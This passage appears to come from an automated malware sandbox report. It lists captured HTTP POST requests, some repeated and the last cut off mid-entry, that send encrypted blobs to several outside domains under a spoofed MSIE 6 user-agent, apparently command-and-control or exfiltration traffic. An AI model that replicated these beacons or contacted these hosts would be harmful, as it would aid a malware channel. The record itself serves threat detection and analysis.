vsiYiOZDRGkVg/MogQpqaQmmF9LGH8VXevaeEdOvX53ARyFMoWaYPsMClppXBoJClpGhzthJHErpIj7+1Ql9/WSGHtK2IkwWTD0tmpfQtoV7dVNktQ2IdBKX5HFMitPrpElP87IOAMpO+uoPfUuseFCqzRz6+jzcQBEyOkpY6aq2UhiolmVcfwS4yeTjZHRzEAz9dK0R6X6Tl5Kh8enmRm5YbsrGjG4iD0Mn2wl+ePVDdO6PUX58MjFGt8bjrfP4qxSv4duV93Z64TJSMGms0W+eB0lsqzZYdvAJ5Mq1LXuzZh5lgT7q3K/jJWMhrqkYK0iWTr67SaWOO7KigSbdUIHB+OQ7eXXloxWZfu/mRhTdX7qMWpzJuTUm8xM3XC7dQDwmI1hJXF1PVHjaF0VUeCCLJDpmo6FanSa6h6q+vcMoHCEQRzblAm7JezW6AqER7W7fsA0QK/Qme+tSZAL+A0DFpI3oOsPtvMfafrcKwZBvunMmpxUDFiTdLrenSg0dIuBFOeXzd8mXquUDXZ8ONtydTkBn2v1c4D4DA+iby7XFwhiR
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 52 75 66 4c 76 6b 4f 32 50 57 6d 49 54 4b 32 79 53 75 61 36 39 32 79 4e 4e 64 4c 70 77 66 46 42 4a 36 41 50 64 36 56 75 4d 68 79 73 69 4b 6f 41 44 69 54 53 68 73 63 65 71 78 45 76 37 65 35 52 7a 31 6c 39 4a 6a 43 46 4d 7a 73 6e 55 70 42 71 61 46 47 67 78 30 44 6a 53 37 4e 2b 38 6b 70 34 61 69 65 31 53 70 6d 4d 63 50 54 42 56 31 2f 65 53 6c 4c 2f 30 66 65 49 65 56 6f 47 5a 32 38 47 52 63 49 4d 33 43 53 66 35 4c 35 54 31 67 37 33 4b 78 64 36 42 62 41 6c 6c 4d 36 61 6f 6e 48 6d 67 35 4d 36 73 47 65 68 51 70 47 49 62 56 4a 37 68 76 63 54 75 45 6c 2f 74 54 6e 4c 65 64 4e 5a 4a 36 2f 4a 63 53 5a 7a 54 38 54 44 73 31 66 41 54 33 56 65 55 71 45 76 39 4c 62 75 49 71 2b 30 38 42 59 49 4e 75 42 58 46 76 6a 33 36 4d 6c 67 51 39 53 52 75 42 32 34 36 6d 66 50 66 63 43 46 46 59 46 34 32 5a 2f 2f 4c 53 67 73 58 73 4e 78 64 38 78 4a 33 4b 2b 68 51 78 55 45 67 79 51 48 58 54 75 55 64 79 4c 54 50 62 65 73 72 72 39 79 56 72 77 31 79 6d 42 61 4d 38 7a 43 57 38 53 47 43 37 46 4b 70 73 4a 41 64 74 2f 69 39 69 44 32 49 69 51 6e 4b 58 32 5a 6d 71 66 43 31 36 6b 34 44 4d 56 54 66 50 70 66 4e 5a 65 52 32 68 78 64 72 44 45 41 52 4f 44 4e 72 78 55 74 34 76 34 4c 2b 79 54 59 31 37 77 68 56 39 45 4a 38 71 45 58 51 6f 42 45 50 2b 6a 44 78 59 6b 53 65 35 41 35 2b 41 2b 51 48 76 2b 62 6f 79 76 57 63 6d 48 6e 53 49 38 51 63 77 49 39 35 74 6c 61 41 72 78 6f 68 71 50 46 72 72 71 6f 67 43 45 4f 62 48 62 71 6d 41 4b 65 51 55 6f 6c 47 2b 78 6f 46 69 62 35 70 43 39 71 64 53 46 67 32 52 57 66 44 35 72 42 7a 66 56 37 61 4a 32 43 48 31 6e 4c 6f 67 71 41 64 4e 47 56 35 48 6e 35 4f 4b 77 43 42 70 4e 44 70 59 6a 6f 77 7a 59 4a 73 36 54 56 68 49 55 55 74 50 36 79 65 38 4e 32 6e 6a 64 34 31 34 4a 39 5a 70 64 43 59 74 57 73 42 43 34 5a 6a 6b 53 79 64 53 63 3d Data Ascii: RufLvkO2PWmITK2ySua692yNNdLpwfFBJ6APd6VuMhysiKoADiTShsceqxEv7e5Rz1l9JjCFMzsnUpBqaFGgx0DjS7N+8kp4aie1SpmMcPTBV1/eSlL/0feIeVoGZ28GRcIM3CSf5L5T1g73Kxd6BbAllM6aonHmg5M6sGehQpGIbVJ7hvcTuEl/tTnLedNZJ6/JcSZzT8TDs1fAT3VeUqEv9LbuIq+08BYINuBXFvj36MlgQ9SRuB246mfPfcCFFYF42Z//LSgsXsNxd8xJ3K+hQxUEgyQHXTuUdyLTPbesrr9yVrw1ymBaM8zCW8SGC7FKpsJAdt/i9iD2IiQnKX2ZmqfC16k4DMVTfPpfNZeR2hxdrDEARODNrxUt4v4L+yTY17whV9EJ8qEXQoBEP+jDxYkSe5A5+A+QHv+boyvWcmHnSI8QcwI95tlaArxohqPFrrqogCEObHbqmAKeQUolG+xoFib5pC9qdSFg2RWfD5rBzfV7aJ2CH1nLogqAdNGV5Hn5OKwCBpNDpYjowzYJs6TVhIUUtP6ye8N2njd414J9ZpdCYtWsBC4ZjkSydSc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 44 31 51 6e 6b 50 62 53 54 47 6e 58 64 41 76 74 55 61 31 70 79 35 6e 58 70 36 59 57 4e 4f 64 74 69 6d 34 65 2f 6a 5a 35 45 54 70 70 68 47 58 39 46 6f 2f 6d 68 52 56 59 2f 4d 36 58 6e 2b 59 78 68 51 4a 38 46 70 70 46 61 54 34 6a 4c 55 34 42 70 64 6b 2f 32 54 45 68 46 2f 32 67 70 70 46 78 4b 43 48 4f 39 44 43 51 55 31 62 35 50 59 4a 59 78 33 6f 37 52 50 74 6d 71 55 56 58 79 44 52 39 47 33 37 4d 62 63 52 6a 47 4f 58 6d 6e 37 30 67 39 49 2f 5a 6c 32 52 4d 69 6c 30 4c 76 4d 54 63 44 6b 36 6e 68 50 74 31 32 44 66 62 70 4a 41 34 43 77 4c 62 4a 65 59 78 4b 57 71 30 63 53 55 6a 69 5a 43 5a 61 61 59 32 38 6d 64 55 55 45 36 79 4a 77 65 6b 65 6a 66 44 69 64 4c 6b 66 52 7a 54 77 36 59 69 45 42 36 47 4b 51 39 50 6d 70 78 4e 46 4b 42 68 79 4c 73 74 53 6d 55 5a 7a 79 44 58 6f 62 6a 35 43 72 35 78 2b 72 57 73 65 52 37 57 66 59 5a 33 42 6f 79 51 69 76 55 38 37 79 71 6b 6a 73 4d 54 67 46 71 72 2f 72 36 78 6a 6f 6e 49 38 7a 36 47 45 61 4a 74 70 6e 4f 66 39 49 4f 73 6b 65 72 51 41 36 51 63 52 45 44 50 72 4b 43 39 67 62 41 34 70 48 6c 2b 70 43 56 48 42 71 56 55 74 50 65 72 69 4d 34 39 67 6e 33 4d 70 38 55 39 4e 77 68 2f 42 42 47 45 50 33 58 78 70 64 62 42 71 71 64 45 4e 43 4b 37 55 6d 76 4c 4f 66 74 76 35 6d 47 56 59 6c 45 55 7a 42 45 71 32 33 67 57 38 57 77 4e 70 65 6e 59 6a 55 6e 50 58 49 43 5a 65 77 61 6f 33 7a 42 56 72 37 61 34 36 59 68 66 59 42 77 6d 73 76 76 51 63 64 38 6b 55 77 70 35 53 39 4b 58 57 57 33 34 31 36 76 6d 47 53 55 63 6a 43 79 47 74 77 4f 61 69 74 46 32 6b 64 6e 53 74 57 33 46 6d 36 68 32 71 68 72 4e 55 32 6c 59 6a 4d 38 46 30 50 4c 41 46 6b 58 6b 61 51 3d 3d Data Ascii: D1QnkPbSTGnXdAvtUa1py5nXp6YWNOdtim4e/jZ5ETpphGX9Fo/mhRVY/M6Xn+YxhQJ8FppFaT4jLU4Bpdk/2TEhF/2gppFxKCHO9DCQU1b5PYJYx3o7RPtmqUVXyDR9G37MbcRjGOXmn70g9I/Zl2RMil0LvMTcDk6nhPt12DfbpJA4CwLbJeYxKWq0cSUjiZCZaaY28mdUUE6yJwekejfDidLkfRzTw6YiEB6GKQ9PmpxNFKBhyLstSmUZzyDXobj5Cr5x+rWseR7WfYZ3BoyQivU87yqkjsMTgFqr/r6xjonI8z6GEaJtpnOf9IOskerQA6QcREDPrKC9gbA4pHl+pCVHBqVUtPeriM49gn3Mp8U9Nwh/BBGEP3XxpdbBqqdENCK7UmvLOftv5mGVYlEUzBEq23gW8WwNpenYjUnPXICZewao3zBVr7a46YhfYBwmsvvQcd8kUwp5S9KXWW3416vmGSUcjCyGtwOaitF2kdnStW3Fm6h2qhrNU2lYjM8F0PLAFkXkaQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tyrns.comCache-Control: no-cacheData Raw: 71 6e 4b 5a 53 53 6f 34 51 6d 6c 51 65 48 67 63 44 59 6c 47 63 2b 31 57 5a 70 39 61 49 34 4e 6c 2f 71 77 44 45 45 7a 5a 76 30 62 76 2b 39 34 75 71 72 69 46 32 49 6a 41 4e 36 62 47 37 39 54 4b 62 35 6c 4d 6d 4f 50 55 61 69 4d 5a 42 2f 50 68 37 52 4d 6a 61 4d 4a 56 39 39 75 52 30 58 62 2f 70 79 34 75 4e 6c 59 74 78 4d 6a 6a 6b 73 59 48 6e 76 62 6f 61 5a 42 78 61 6e 72 4e 62 73 33 74 53 50 6b 47 53 34 59 74 64 75 79 63 5a 46 52 57 43 38 74 49 6f 47 2f 45 55 76 48 66 59 61 47 50 32 36 63 78 38 50 33 79 79 4e 36 5a 72 35 6b 48 31 34 65 45 45 2f 54 62 77 34 58 77 79 6d 6c 46 53 73 58 57 6e 32 33 52 71 67 55 2f 58 2f 73 46 63 62 30 75 64 4d 43 30 74 68 6d 66 63 51 75 68 70 30 74 55 46 54 62 38 6b 52 5a 63 72 69 6e 76 74 6b 54 31 71 61 6b 50 6e 47 37 43 5a 6a 63 42 63 52 2b 58 4b 57 59 4a 32 30 4e 63 4b 4d 44 75 5a 49 78 71 30 50 69 73 6f 4e 53 35 58 5a 30 6b 38 54 31 7a 6f 57 6f 36 53 6b 55 53 4f 6d 2f 61 42 67 2f 61 6c 6f 77 31 47 6e 53 30 53 46 4d 2f 32 36 4f 5a 73 5a 49 75 70 31 32 4f 78 73 63 75 69 36 51 67 66 32 57 30 36 2f 5a 58 6a 54 44 38 48 58 35 2b 31 51 71 50 77 41 79 44 32 58 6e 71 43 58 5a 42 5a 77 33 31 74 4e 73 7a 5a 36 58 48 64 63 68 32 4c 76 43 2f 64 32 51 73 50 48 32 32 6a 7a 30 32 43 36 6d 4c 57 46 71 7a 65 74 66 66 57 42 64 47 79 36 4a 38 54 2b 73 6d 46 6b 37 2f 56 42 56 78 35 47 37 74 45 53 4d 69 58 37 38 76 42 2b 6b 4e 53 4e 4e 64 36 56 49 37 6a 2f 56 63 56 38 6d 59 39 78 67 71 41 59 4f 59 67 56 6c 54 64 46 66 74 41 53 65 41 66 49 68 33 36 57 77 75 6a 41 75 74 39 36 34 4a 58 59 54 62 62 73 74 74 4f 6a 46 56 6a 46 46 34 39 79 51 57 45 45 41 44 70 2b 50 36 6f 77 50 72 50 6a 79 53 36 6d 56 6b 4a 67 38 71 4a 42 6d 37 4d 62 41 71 4d 63 6b 4a 41 39 72 43 39 36 6b 3d Data Ascii: qnKZSSo4QmlQeHgcDYlGc+1WZp9aI4Nl/qwDEEzZv0bv+94uqriF2IjAN6bG79TKb5lMmOPUaiMZB/Ph7RMjaMJV99uR0Xb/py4uNlYtxMjjksYHnvboaZBxanrNbs3tSPkGS4YtduycZFRWC8tIoG/EUvHfYaGP26cx8P3yyN6Zr5kH14eEE/Tbw4XwymlFSsXWn23RqgU/X/sFcb0udMC0thmfcQuhp0tUFTb8kRZcrinvtkT1qakPnG7CZjcBcR+XKWYJ20NcKMDuZIxq0PisoNS5XZ0k8T1zoWo6SkUSOm/aBg/alow1GnS0SFM/26OZsZIup12Oxscui6Qgf2W06/ZXjTD8HX5+1QqPwAyD2XnqCXZBZw31tNszZ6XHdch2LvC/d2QsPH22jz02C6mLWFqzetffWBdGy6J8T+smFk7/VBVx5G7tESMiX78vB+kNSNNd6VI7j/VcV8mY9xgqAYOYgVlTdFftASeAfIh36WwujAut964JXYTbbsttOjFVjFF49yQWEEADp+P6owPrPjyS6mVkJg8qJBm7MbAqMckJA9rC96k=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 30 50 41 44 50 68 6f 6f 53 6d 6e 63 6e 49 62 70 50 56 69 33 43 31 33 34 58 59 73 4b 4f 76 45 30 37 74 74 7a 46 71 57 74 75 4c 4d 5a 4a 4c 47 61 31 77 76 45 49 4b 46 31 43 67 63 4e 6f 55 75 30 6c 73 37 51 7a 31 77 38 77 77 66 68 75 62 64 6a 56 4b 45 4e 55 51 68 49 59 38 62 66 73 76 65 51 59 44 74 4c 7a 5a 56 2f 76 61 6a 4f 6a 66 45 72 70 6f 36 31 6c 67 2b 64 78 75 66 57 64 43 67 77 5a 4d 2b 35 2b 72 6f 36 36 4c 36 69 52 68 57 6d 30 44 35 4d 37 55 4b 79 69 6d 6f 39 75 5a 71 6c 6e 64 73 72 4b 35 31 4f 5a 6f 35 4c 5a 6a 49 43 69 45 39 4a 61 7a 6a 48 6e 49 42 64 69 78 45 39 56 46 58 35 44 4c 37 67 76 50 71 71 73 6f 4a 33 35 31 44 51 6a 39 71 6e 71 6d 34 78 67 72 37 68 32 59 2f 2f 44 63 77 42 79 50 75 4f 74 45 6f 36 55 44 4b 53 67 68 4b 39 75 38 74 6a 64 69 63 59 6b 6c 38 37 39 73 62 4d 6c 6e 4c 36 44 46 30 2f 61 69 64 61 6f 78 63 53 43 68 67 7a 72 63 6e 41 2f 76 4c 34 6d 64 56 59 6d 46 53 30 43 39 62 30 64 74 55 74 34 73 64 4f 69 78 57 4a 50 79 4c 36 6d 44 33 75 57 42 73 32 41 45 74 46 37 61 33 31 51 50 65 35 75 77 66 6c 79 48 54 35 65 4f 2b 6b 6c 6e 6f 6f 64 44 39 2b 34 56 65 6f 6d 75 34 55 52 2f 51 4e 39 44 72 36 59 41 55 61 67 55 43 4c 46 65 6c 6b 5a 57 54 54 46 6f 45 53 61 67 33 7a 4f 33 70 68 42 52 46 70 33 59 53 34 4c 68 44 64 45 6d 2f 79 57 55 72 53 78 38 31 53 63 4c 2f 54 34 69 48 6c 5a 47 4e 51 74 59 38 2f 75 36 30 4f 75 2f 6c 47 59 4a 50 64 4f 39 41 46 2b 6e 62 41 77 4e 6d 68 4a 74 4a 38 64 43 45 39 7a 49 4d 6b 32 6e 4d 75 65 4f 2f 4c 65 42 66 77 71 44 71 6a 78 2b 6a 4e 7a 7a 36 53 61 57 6b 4f 73 62 76 47 6e 73 76 73 33 64 61 6c 54 6c 6d 49 57 32 30 6c 68 48 63 50 64 7a 4a 6d 2f 67 76 66 78 5a 58 65 4e 35 54 57 62 74 5a 57 41 67 6a 59 45 53 6d 71 64 51 3d 3d Data Ascii: 0PADPhooSmncnIbpPVi3C134XYsKOvE07ttzFqWtuLMZJLGa1wvEIKF1CgcNoUu0ls7Qz1w8wwfhubdjVKENUQhIY8bfsveQYDtLzZV/vajOjfErpo61lg+dxufWdCgwZM+5+ro66L6iRhWm0D5M7UKyimo9uZqlndsrK51OZo5LZjICiE9JazjHnIBdixE9VFX5DL7gvPqqsoJ351DQj9qnqm4xgr7h2Y//DcwByPuOtEo6UDKSghK9u8tjdicYkl879sbMlnL6DF0/aidaoxcSChgzrcnA/vL4mdVYmFS0C9b0dtUt4sdOixWJPyL6mD3uWBs2AEtF7a31QPe5uwflyHT5eO+klnoodD9+4Veomu4UR/QN9Dr6YAUagUCLFelkZWTTFoESag3zO3phBRFp3YS4LhDdEm/yWUrSx81ScL/T4iHlZGNQtY8/u60Ou/lGYJPdO9AF+nbAwNmhJtJ8dCE9zIMk2nMueO/LeBfwqDqjx+jNzz6SaWkOsbvGnsvs3dalTlmIW20lhHcPdzJm/gvfxZXeN5TWbtZWAgjYESmqdQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 68 4a 64 49 43 66 54 42 55 47 6b 45 48 73 67 55 54 77 53 6b 73 30 66 68 73 79 7a 73 43 66 56 66 61 50 34 4f 63 63 55 35 62 6a 64 51 78 6c 63 44 59 2f 38 4d 38 6a 68 74 6e 51 59 77 55 6b 41 72 51 74 49 55 4f 74 51 57 54 41 49 71 46 34 54 4f 74 73 78 43 2b 4c 37 69 4e 41 4b 4f 53 56 42 53 61 4f 6c 31 31 63 33 50 41 2f 47 31 53 77 2f 7a 7a 67 52 73 71 4e 64 6c 76 33 30 53 53 6b 69 63 71 67 70 74 33 5a 42 4c 55 67 38 4d 2b 42 31 78 62 6a 62 4c 4c 74 32 73 36 4f 73 45 2b 52 61 52 6c 6c 50 53 61 6f 2f 30 70 38 34 75 78 75 76 32 49 39 6e 54 64 2b 52 51 64 75 64 6a 45 50 71 5a 7a 6e 45 6f 52 58 79 56 42 67 59 4e 4d 52 76 69 44 4e 78 30 4e 4b 2b 56 43 4a 38 4f 61 75 73 34 73 2b 68 33 37 56 2f 4e 5a 77 37 35 44 66 57 54 44 4d 7a 35 4e 56 4e 77 52 6a 46 69 4e 6f 6e 54 54 52 33 63 78 58 69 71 4f 4c 45 37 6c 34 45 6f 79 4f 37 39 55 55 72 55 33 76 43 4f 72 71 4c 52 55 63 57 42 6d 2f 38 71 59 42 4a 4b 68 54 2f 65 4d 6f 44 42 6b 4e 63 66 63 78 34 2b 4e 70 6d 45 2f 74 46 6c 6b 59 6a 47 66 74 62 4a 58 76 4f 57 59 4c 66 49 34 2f 52 6d 78 4b 79 52 4d 4b 6b 4c 38 4c 69 6f 77 4d 50 4a 4a 4b 44 59 42 4b 64 59 64 2b 70 74 53 6d 76 70 50 58 58 61 79 31 79 6b 66 52 6b 72 77 74 53 63 58 61 33 68 51 4d 33 37 6a 74 35 4f 66 75 6d 72 48 74 4d 4c 36 4a 57 2f 77 75 64 53 58 61 4b 4f 71 2b 4f 43 39 63 43 41 4d 4a 66 47 77 73 32 4d 6b 6c 31 65 63 78 52 35 43 73 6c 45 42 58 54 39 44 51 73 79 6f 57 78 48 77 75 7a 79 41 4d 35 64 44 4f 46 6b 30 63 63 75 6b 56 68 34 30 61 56 71 4f 64 78 68 52 30 50 34 53 61 6b 55 67 42 38 55 6c 2b 7a 41 6d 4f 4d 76 6f 32 4b 79 6f 62 6a 46 73 52 51 72 66 74 62 69 72 39 6f 41 47 71 74 35 6c 63 6a 2f 51 58 76 6d 6b 44 70 58 61 77 5a 30 6b 67 37 2f 78 6b 76 37 4a 51 35 35 37 58 76 4e 67 50 6d 74 77 71 36 5a 70 6e 66 57 47 75 34 30 31 45 38 3d Data Ascii: hJdICfTBUGkEHsgUTwSks0fhsyzsCfVfaP4OccU5bjdQxlcDY/8M8jhtnQYwUkArQtIUOtQWTAIqF4TOtsxC+L7iNAKOSVBSaOl11c3PA/G1Sw/zzgRsqNdlv30SSkicqgpt3ZBLUg8M+B1xbjbLLt2s6OsE+RaRllPSao/0p84uxuv2I9nTd+RQdudjEPqZznEoRXyVBgYNMRviDNx0NK+VCJ8Oaus4s+h37V/NZw75DfWTDMz5NVNwRjFiNonTTR3cxXiqOLE7l4EoyO79UUrU3vCOrqLRUcWBm/8qYBJKhT/eMoDBkNcfcx4+NpmE/tFlkYjGftbJXvOWYLfI4/RmxKyRMKkL8LiowMPJJKDYBKdYd+ptSmvpPXXay1ykfRkrwtScXa3hQM37jt5OfumrHtML6JW/wudSXaKOq+OC9cCAMJfGws2Mkl1ecxR5CslEBXT9DQsyoWxHwuzyAM5dDOFk0ccukVh40aVqOdxhR0P4SakUgB8Ul+zAmOMvo2KyobjFsRQrftbir9oAGqt5lcj/QXvmkDpXawZ0kg7/xkv7JQ557XvNgPmtwq6ZpnfWGu401E8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 44 31 51 6e 6b 50 62 53 54 47 6e 58 64 41 76 74 55 61 31 70 79 35 6e 58 70 36 59 57 4e 4f 64 74 69 6d 34 65 2f 6a 5a 35 45 54 70 70 68 47 58 39 46 6f 2f 6d 68 52 56 59 2f 4d 36 58 6e 2b 59 78 68 51 4a 38 46 70 70 46 61 54 34 6a 4c 55 34 42 70 64 6b 2f 32 54 45 68 46 2f 32 67 70 70 46 78 4b 43 48 4f 39 44 43 51 55 31 62 35 50 59 4a 59 78 33 6f 37 52 50 74 6d 71 55 56 58 79 44 52 39 47 33 37 4d 62 63 52 6a 47 4f 58 6d 6e 37 30 67 39 49 2f 5a 6c 32 52 4d 69 6c 30 4c 76 4d 54 63 44 6b 36 6e 68 50 74 31 32 44 66 62 70 4a 41 34 43 77 4c 62 4a 65 59 78 4b 57 71 30 63 53 55 6a 69 5a 43 5a 61 61 59 32 38 6d 64 55 55 45 36 79 4a 77 65 6b 65 6a 66 44 69 64 4c 6b 66 52 7a 54 77 36 59 69 45 42 36 47 4b 51 39 50 6d 70 78 4e 46 4b 42 68 79 4c 73 74 53 6d 55 5a 7a 79 44 58 6f 62 6a 35 43 72 35 78 2b 72 57 73 65 52 37 57 66 59 5a 33 42 6f 79 51 69 76 55 38 37 79 71 6b 6a 73 4d 54 67 46 71 72 2f 72 36 78 6a 6f 6e 49 38 7a 36 47 45 61 4a 74 70 6e 4f 66 39 49 4f 73 6b 65 72 51 41 36 51 63 52 45 44 50 72 4b 43 39 67 62 41 34 70 48 6c 2b 70 43 56 48 42 71 56 55 74 50 65 72 69 4d 34 39 67 6e 33 4d 70 38 55 39 4e 77 68 2f 42 42 47 45 50 33 58 78 70 64 62 42 71 71 64 45 4e 43 4b 37 55 6d 76 4c 4f 66 74 76 35 6d 47 56 59 6c 45 55 7a 42 45 71 32 33 67 57 38 57 77 4e 70 65 6e 59 6a 55 6e 50 58 49 43 5a 65 77 61 6f 33 7a 42 56 72 37 61 34 36 59 68 66 59 42 77 6d 73 76 76 51 63 64 38 6b 55 77 70 35 53 39 4b 58 57 57 33 34 31 36 76 6d 47 53 55 63 6a 43 79 47 74 77 4f 61 69 74 46 32 6b 64 6e 53 74 57 33 46 6d 36 68 32 71 68 72 4e 55 32 6c 59 6a 4d 38 46 30 50 4c 41 46 6b 58 6b 61 51 3d 3d Data Ascii: D1QnkPbSTGnXdAvtUa1py5nXp6YWNOdtim4e/jZ5ETpphGX9Fo/mhRVY/M6Xn+YxhQJ8FppFaT4jLU4Bpdk/2TEhF/2gppFxKCHO9DCQU1b5PYJYx3o7RPtmqUVXyDR9G37MbcRjGOXmn70g9I/Zl2RMil0LvMTcDk6nhPt12DfbpJA4CwLbJeYxKWq0cSUjiZCZaaY28mdUUE6yJwekejfDidLkfRzTw6YiEB6GKQ9PmpxNFKBhyLstSmUZzyDXobj5Cr5x+rWseR7WfYZ3BoyQivU87yqkjsMTgFqr/r6xjonI8z6GEaJtpnOf9IOskerQA6QcREDPrKC9gbA4pHl+pCVHBqVUtPeriM49gn3Mp8U9Nwh/BBGEP3XxpdbBqqdENCK7UmvLOftv5mGVYlEUzBEq23gW8WwNpenYjUnPXICZewao3zBVr7a46YhfYBwmsvvQcd8kUwp5S9KXWW3416vmGSUcjCyGtwOaitF2kdnStW3Fm6h2qhrNU2lYjM8F0PLAFkXkaQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 30 50 41 44 50 68 6f 6f 53 6d 6e 63 6e 49 62 70 50 56 69 33 43 31 33 34 58 59 73 4b 4f 76 45 30 37 74 74 7a 46 71 57 74 75 4c 4d 5a 4a 4c 47 61 31 77 76 45 49 4b 46 31 43 67 63 4e 6f 55 75 30 6c 73 37 51 7a 31 77 38 77 77 66 68 75 62 64 6a 56 4b 45 4e 55 51 68 49 59 38 62 66 73 76 65 51 59 44 74 4c 7a 5a 56 2f 76 61 6a 4f 6a 66 45 72 70 6f 36 31 6c 67 2b 64 78 75 66 57 64 43 67 77 5a 4d 2b 35 2b 72 6f 36 36 4c 36 69 52 68 57 6d 30 44 35 4d 37 55 4b 79 69 6d 6f 39 75 5a 71 6c 6e 64 73 72 4b 35 31 4f 5a 6f 35 4c 5a 6a 49 43 69 45 39 4a 61 7a 6a 48 6e 49 42 64 69 78 45 39 56 46 58 35 44 4c 37 67 76 50 71 71 73 6f 4a 33 35 31 44 51 6a 39 71 6e 71 6d 34 78 67 72 37 68 32 59 2f 2f 44 63 77 42 79 50 75 4f 74 45 6f 36 55 44 4b 53 67 68 4b 39 75 38 74 6a 64 69 63 59 6b 6c 38 37 39 73 62 4d 6c 6e 4c 36 44 46 30 2f 61 69 64 61 6f 78 63 53 43 68 67 7a 72 63 6e 41 2f 76 4c 34 6d 64 56 59 6d 46 53 30 43 39 62 30 64 74 55 74 34 73 64 4f 69 78 57 4a 50 79 4c 36 6d 44 33 75 57 42 73 32 41 45 74 46 37 61 33 31 51 50 65 35 75 77 66 6c 79 48 54 35 65 4f 2b 6b 6c 6e 6f 6f 64 44 39 2b 34 56 65 6f 6d 75 34 55 52 2f 51 4e 39 44 72 36 59 41 55 61 67 55 43 4c 46 65 6c 6b 5a 57 54 54 46 6f 45 53 61 67 33 7a 4f 33 70 68 42 52 46 70 33 59 53 34 4c 68 44 64 45 6d 2f 79 57 55 72 53 78 38 31 53 63 4c 2f 54 34 69 48 6c 5a 47 4e 51 74 59 38 2f 75 36 30 4f 75 2f 6c 47 59 4a 50 64 4f 39 41 46 2b 6e 62 41 77 4e 6d 68 4a 74 4a 38 64 43 45 39 7a 49 4d 6b 32 6e 4d 75 65 4f 2f 4c 65 42 66 77 71 44 71 6a 78 2b 6a 4e 7a 7a 36 53 61 57 6b 4f 73 62 76 47 6e 73 76 73 33 64 61 6c 54 6c 6d 49 57 32 30 6c 68 48 63 50 64 7a 4a 6d 2f 67 76 66 78 5a 58 65 4e 35 54 57 62 74 5a 57 41 67 6a 59 45 53 6d 71 64 51 3d 3d Data Ascii: 0PADPhooSmncnIbpPVi3C134XYsKOvE07ttzFqWtuLMZJLGa1wvEIKF1CgcNoUu0ls7Qz1w8wwfhubdjVKENUQhIY8bfsveQYDtLzZV/vajOjfErpo61lg+dxufWdCgwZM+5+ro66L6iRhWm0D5M7UKyimo9uZqlndsrK51OZo5LZjICiE9JazjHnIBdixE9VFX5DL7gvPqqsoJ351DQj9qnqm4xgr7h2Y//DcwByPuOtEo6UDKSghK9u8tjdicYkl879sbMlnL6DF0/aidaoxcSChgzrcnA/vL4mdVYmFS0C9b0dtUt4sdOixWJPyL6mD3uWBs2AEtF7a31QPe5uwflyHT5eO+klnoodD9+4Veomu4UR/QN9Dr6YAUagUCLFelkZWTTFoESag3zO3phBRFp3YS4LhDdEm/yWUrSx81ScL/T4iHlZGNQtY8/u60Ou/lGYJPdO9AF+nbAwNmhJtJ8dCE9zIMk2nMueO/LeBfwqDqjx+jNzz6SaWkOsbvGnsvs3dalTlmIW20lhHcPdzJm/gvfxZXeN5TWbtZWAgjYESmqdQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 68 4a 64 49 43 66 54 42 55 47 6b 45 48 73 67 55 54 77 53 6b 73 30 66 68 73 79 7a 73 43 66 56 66 61 50 34 4f 63 63 55 35 62 6a 64 51 78 6c 63 44 59 2f 38 4d 38 6a 68 74 6e 51 59 77 55 6b 41 72 51 74 49 55 4f 74 51 57 54 41 49 71 46 34 54 4f 74 73 78 43 2b 4c 37 69 4e 41 4b 4f 53 56 42 53 61 4f 6c 31 31 63 33 50 41 2f 47 31 53 77 2f 7a 7a 67 52 73 71 4e 64 6c 76 33 30 53 53 6b 69 63 71 67 70 74 33 5a 42 4c 55 67 38 4d 2b 42 31 78 62 6a 62 4c 4c 74 32 73 36 4f 73 45 2b 52 61 52 6c 6c 50 53 61 6f 2f 30 70 38 34 75 78 75 76 32 49 39 6e 54 64 2b 52 51 64 75 64 6a 45 50 71 5a 7a 6e 45 6f 52 58 79 56 42 67 59 4e 4d 52 76 69 44 4e 78 30 4e 4b 2b 56 43 4a 38 4f 61 75 73 34 73 2b 68 33 37 56 2f 4e 5a 77 37 35 44 66 57 54 44 4d 7a 35 4e 56 4e 77 52 6a 46 69 4e 6f 6e 54 54 52 33 63 78 58 69 71 4f 4c 45 37 6c 34 45 6f 79 4f 37 39 55 55 72 55 33 76 43 4f 72 71 4c 52 55 63 57 42 6d 2f 38 71 59 42 4a 4b 68 54 2f 65 4d 6f 44 42 6b 4e 63 66 63 78 34 2b 4e 70 6d 45 2f 74 46 6c 6b 59 6a 47 66 74 62 4a 58 76 4f 57 59 